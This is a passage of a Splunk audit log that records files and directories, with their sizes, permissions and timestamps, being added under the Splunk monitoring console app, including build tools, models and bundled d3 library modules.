action=add,path="/opt/splunk/etc/apps/splunk_monitoring_console/build_tools/profiles/common/coreAliases.config.js", isdir=0, size=213, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:10.761, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_monitoring_console/build_tools/profiles/visualizations.config.js", isdir=0, size=1263, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:10.757, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_monitoring_console/build_tools/profiles/pages-lite.config.js", isdir=0, size=1157, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:10.754, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_monitoring_console/build_tools/profiles/pages-enterprise.config.js", isdir=0, size=1295, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:10.750, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_monitoring_console/build_tools/profiles/kpitrafficlight.config.js", isdir=0, size=1195, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:10.744, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_monitoring_console/build_tools/profiles/extensions.config.js", isdir=0, size=2523, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:10.740, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_monitoring_console/build_tools/profiles/css_bootstrap.config.js", isdir=0, size=520, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:10.737, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_monitoring_console/build_tools/profiles/common", isdir=1, size=4096, gid=41812, uid=41812, modtime="Sat May 1 18:45:21 2021", mode="rwxr-xr-x", hash=] Audit:[timestamp=10-06-2022 17:42:10.733, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_monitoring_console/build_tools/profiles/bootstrap-styles.config.js", isdir=0, size=465, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:10.628, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_monitoring_console/build_tools/web_loaders", isdir=1, size=4096, gid=41812, uid=41812, modtime="Sat May 1 18:45:21 2021", mode="rwxr-xr-x", hash=] Audit:[timestamp=10-06-2022 17:42:10.625, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_monitoring_console/build_tools/util", isdir=1, size=4096, gid=41812, uid=41812, modtime="Sat May 1 18:45:21 2021", mode="rwxr-xr-x", hash=] Audit:[timestamp=10-06-2022 17:42:10.621, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_monitoring_console/build_tools/tasks.js", isdir=0, size=1900, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:10.618, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_monitoring_console/build_tools/profiles", isdir=1, size=4096, gid=41812, uid=41812, modtime="Sat May 1 18:45:21 2021", mode="rwxr-xr-x", hash=] Audit:[timestamp=10-06-2022 17:42:10.614, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_monitoring_console/build_tools/postcss_plugins", isdir=1, size=4096, gid=41812, uid=41812, modtime="Sat May 1 18:45:16 2021", mode="rwxr-xr-x", hash=] Audit:[timestamp=10-06-2022 17:42:10.610, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_monitoring_console/build_tools/plugins", isdir=1, size=4096, gid=41812, uid=41812, modtime="Sat May 1 18:45:21 2021", mode="rwxr-xr-x", hash=] Audit:[timestamp=10-06-2022 17:42:10.606, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_monitoring_console/build_tools/constants.js", isdir=0, size=537, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:10.602, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_monitoring_console/build_tools/build.js", isdir=0, size=6723, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:10.597, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_monitoring_console/src/models/splunk_health_check/Task.js", isdir=0, size=10657, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:10.592, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_monitoring_console/src/models/splunk_health_check/DmcConfigs.js", isdir=0, size=2042, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:10.589, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_monitoring_console/src/models/splunk_health_check/Conductor.js", isdir=0, size=4761, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:10.585, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_monitoring_console/src/models/splunk_health_check/CheckList.js", isdir=0, size=13308, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:10.480, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_monitoring_console/src/models/services/data/LookupTableFile.js", isdir=0, size=2048, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:10.477, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_monitoring_console/src/models/services/server/ServerInfo.js", isdir=0, size=6394, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:10.473, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_monitoring_console/src/models/services/server", isdir=1, size=4096, gid=41812, uid=41812, modtime="Sat May 1 18:45:21 2021", mode="rwxr-xr-x", hash=] Audit:[timestamp=10-06-2022 17:42:10.470, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_monitoring_console/src/models/services/data", isdir=1, size=4096, gid=41812, uid=41812, modtime="Sat May 1 18:45:21 2021", mode="rwxr-xr-x", hash=] Audit:[timestamp=10-06-2022 17:42:10.465, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_monitoring_console/src/models/splunk_health_check", isdir=1, size=4096, gid=41812, uid=41812, modtime="Sat May 1 18:45:21 2021", mode="rwxr-xr-x", hash=] Audit:[timestamp=10-06-2022 17:42:10.460, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_monitoring_console/src/models/services", isdir=1, size=4096, gid=41812, uid=41812, modtime="Sat May 1 18:45:16 2021", mode="rwxr-xr-x", hash=] Audit:[timestamp=10-06-2022 17:42:10.456, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_monitoring_console/src/models/TopologyInfo.js", isdir=0, size=2402, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:10.452, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_monitoring_console/src/models/ThresholdConfig.js", isdir=0, size=5099, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:10.447, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_monitoring_console/src/models/StaticIdSplunkDBase.js", isdir=0, size=1851, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:10.444, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_monitoring_console/src/models/Peer.js", isdir=0, size=10011, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:10.440, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_monitoring_console/src/models/Metric.js", isdir=0, size=946, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:10.437, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_monitoring_console/src/models/LocalInstance.js", isdir=0, size=3163, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:10.433, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_monitoring_console/src/models/DistsearchGroup.js", isdir=0, size=4390, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:10.429, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_monitoring_console/src/models/Bookmark.js", isdir=0, size=973, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:10.424, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_monitoring_console/src/models/Asset.js", isdir=0, size=1937, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:10.317, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_monitoring_console/src/collections/splunk_health_check/Tasks.js", isdir=0, size=10837, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:10.312, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_monitoring_console/src/collections/splunk_health_check/CheckLists.js", isdir=0, size=952, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:10.306, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_monitoring_console/src/collections/services/data/LookupTableFiles.js", isdir=0, size=504, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:10.302, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_monitoring_console/src/collections/services/data", isdir=1, size=4096, gid=41812, uid=41812, modtime="Sat May 1 18:45:21 2021", mode="rwxr-xr-x", hash=] Audit:[timestamp=10-06-2022 17:42:10.297, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_monitoring_console/src/collections/services/AppLocals.js", isdir=0, size=6722, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:10.192, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_monitoring_console/src/collections/splunk_health_check", isdir=1, size=4096, gid=41812, uid=41812, modtime="Sat May 1 18:45:21 2021", mode="rwxr-xr-x", hash=] Audit:[timestamp=10-06-2022 17:42:10.188, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_monitoring_console/src/collections/services", isdir=1, size=4096, gid=41812, uid=41812, modtime="Sat May 1 18:45:21 2021", mode="rwxr-xr-x", hash=] Audit:[timestamp=10-06-2022 17:42:10.184, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_monitoring_console/src/collections/ThresholdConfigs.js", isdir=0, size=3490, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:10.180, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_monitoring_console/src/collections/Peers.js", isdir=0, size=5907, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:10.175, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_monitoring_console/src/collections/Metrics.js", isdir=0, size=2170, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:10.158, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_monitoring_console/src/collections/LookupTableFiles.js", isdir=0, size=478, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:10.154, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_monitoring_console/src/collections/Instances.js", isdir=0, size=47835, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:10.150, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_monitoring_console/src/collections/DistsearchGroups.js", isdir=0, size=462, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:10.145, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_monitoring_console/src/collections/DMCAlertsSavedSearches.js", isdir=0, size=1711, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:10.141, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_monitoring_console/src/collections/Bookmarks.js", isdir=0, size=1455, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:10.135, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_monitoring_console/src/collections/Assets.js", isdir=0, size=709, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:10.028, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_monitoring_console/src/require/underscore.js", isdir=0, size=320, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:10.024, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_monitoring_console/src/require/backbone.js", isdir=0, size=242, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:10.020, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_monitoring_console/src/visualizations/heatmap/src/heatmap.js", isdir=0, size=27472, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:10.017, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_monitoring_console/src/visualizations/heatmap/node_modules/d3/src/format/round.js", isdir=0, size=115, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:10.013, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_monitoring_console/src/visualizations/heatmap/node_modules/d3/src/format/requote.js", isdir=0, size=129, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:10.005, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_monitoring_console/src/visualizations/heatmap/node_modules/d3/src/format/precision.js", isdir=0, size=98, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:10.000, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_monitoring_console/src/visualizations/heatmap/node_modules/d3/src/format/index.js", isdir=0, size=74, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:09.995, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_monitoring_console/src/visualizations/heatmap/node_modules/d3/src/format/formatPrefix.js", isdir=0, size=736, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:09.991, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_monitoring_console/src/visualizations/heatmap/node_modules/d3/src/format/format.js", isdir=0, size=68, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:09.987, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_monitoring_console/src/visualizations/heatmap/node_modules/d3/src/format/collapse.js", isdir=0, size=68, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:09.881, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_monitoring_console/src/visualizations/heatmap/node_modules/d3/src/xhr/xml.js", isdir=0, size=89, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:09.877, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_monitoring_console/src/visualizations/heatmap/node_modules/d3/src/xhr/xhr.js", isdir=0, size=4043, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:09.873, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_monitoring_console/src/visualizations/heatmap/node_modules/d3/src/xhr/text.js", isdir=0, size=91, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:09.867, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_monitoring_console/src/visualizations/heatmap/node_modules/d3/src/xhr/json.js", isdir=0, size=189, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:09.864, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_monitoring_console/src/visualizations/heatmap/node_modules/d3/src/xhr/index.js", isdir=0, size=73, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:09.859, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_monitoring_console/src/visualizations/heatmap/node_modules/d3/src/xhr/html.js", isdir=0, size=308, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:09.855, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_monitoring_console/src/visualizations/heatmap/node_modules/d3/src/core/zero.js", isdir=0, size=35, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:09.851, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_monitoring_console/src/visualizations/heatmap/node_modules/d3/src/core/vendor.js", isdir=0, size=365, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:09.845, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_monitoring_console/src/visualizations/heatmap/node_modules/d3/src/core/true.js", isdir=0, size=38, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:09.840, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_monitoring_console/src/visualizations/heatmap/node_modules/d3/src/core/target.js", isdir=0, size=45, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:09.833, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_monitoring_console/src/visualizations/heatmap/node_modules/d3/src/core/subclass.js", isdir=0, size=364, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:09.829, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_monitoring_console/src/visualizations/heatmap/node_modules/d3/src/core/source.js", isdir=0, size=45, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:09.825, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_monitoring_console/src/visualizations/heatmap/node_modules/d3/src/core/rebind.js", isdir=0, size=599, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:09.821, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_monitoring_console/src/visualizations/heatmap/node_modules/d3/src/core/ns.js", isdir=0, size=558, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:09.817, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_monitoring_console/src/visualizations/heatmap/node_modules/d3/src/core/noop.js", isdir=0, size=22, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:09.814, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_monitoring_console/src/visualizations/heatmap/node_modules/d3/src/core/index.js", isdir=0, size=48, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:09.809, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_monitoring_console/src/visualizations/heatmap/node_modules/d3/src/core/identity.js", isdir=0, size=40, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:09.805, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_monitoring_console/src/visualizations/heatmap/node_modules/d3/src/core/functor.js", isdir=0, size=118, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:09.801, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_monitoring_console/src/visualizations/heatmap/node_modules/d3/src/core/document.js", isdir=0, size=464, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:09.798, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_monitoring_console/src/visualizations/heatmap/node_modules/d3/src/core/class.js", isdir=0, size=187, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:09.794, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_monitoring_console/src/visualizations/heatmap/node_modules/d3/src/core/array.js", isdir=0, size=126, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:09.689, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_monitoring_console/src/visualizations/heatmap/node_modules/d3/src/scale/threshold.js", isdir=0, size=681, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:09.685, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_monitoring_console/src/visualizations/heatmap/node_modules/d3/src/scale/sqrt.js", isdir=0, size=102, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:09.674, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_monitoring_console/src/visualizations/heatmap/node_modules/d3/src/scale/scale.js", isdir=0, size=283, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:09.667, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_monitoring_console/src/visualizations/heatmap/node_modules/d3/src/scale/quantize.js", isdir=0, size=869, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:09.661, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_monitoring_console/src/visualizations/heatmap/node_modules/d3/src/scale/quantile.js", isdir=0, size=1223, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:09.655, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_monitoring_console/src/visualizations/heatmap/node_modules/d3/src/scale/pow.js", isdir=0, size=1289, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:09.652, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_monitoring_console/src/visualizations/heatmap/node_modules/d3/src/scale/polylinear.js", isdir=0, size=569, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:09.647, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_monitoring_console/src/visualizations/heatmap/node_modules/d3/src/scale/ordinal.js", isdir=0, size=3260, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:09.643, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_monitoring_console/src/visualizations/heatmap/node_modules/d3/src/scale/nice.js", isdir=0, size=618, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:09.639, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_monitoring_console/src/visualizations/heatmap/node_modules/d3/src/scale/log.js", isdir=0, size=2634, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:09.633, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_monitoring_console/src/visualizations/heatmap/node_modules/d3/src/scale/linear.js", isdir=0, size=4797, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:09.629, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_monitoring_console/src/visualizations/heatmap/node_modules/d3/src/scale/index.js", isdir=0, size=190, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:09.622, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_monitoring_console/src/visualizations/heatmap/node_modules/d3/src/scale/identity.js", isdir=0, size=653, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:09.617, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_monitoring_console/src/visualizations/heatmap/node_modules/d3/src/scale/category.js", isdir=0, size=1501, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:09.613, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_monitoring_console/src/visualizations/heatmap/node_modules/d3/src/scale/bilinear.js", isdir=0, size=212, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:09.408, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_monitoring_console/src/visualizations/heatmap/node_modules/d3/src/time/year.js", isdir=0, size=375, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:09.403, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_monitoring_console/src/visualizations/heatmap/node_modules/d3/src/time/week.js", isdir=0, size=1007, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:09.398, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_monitoring_console/src/visualizations/heatmap/node_modules/d3/src/time/time.js", isdir=0, size=1652, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:09.394, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_monitoring_console/src/visualizations/heatmap/node_modules/d3/src/time/second.js", isdir=0, size=391, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:09.388, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_monitoring_console/src/visualizations/heatmap/node_modules/d3/src/time/scale.js", isdir=0, size=4394, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:09.383, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_monitoring_console/src/visualizations/heatmap/node_modules/d3/src/time/scale-utc.js", isdir=0, size=856, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:09.379, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_monitoring_console/src/visualizations/heatmap/node_modules/d3/src/time/month.js", isdir=0, size=367, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:09.374, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_monitoring_console/src/visualizations/heatmap/node_modules/d3/src/time/minute.js", isdir=0, size=391, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:09.369, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_monitoring_console/src/visualizations/heatmap/node_modules/d3/src/time/interval.js", isdir=0, size=1505, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", 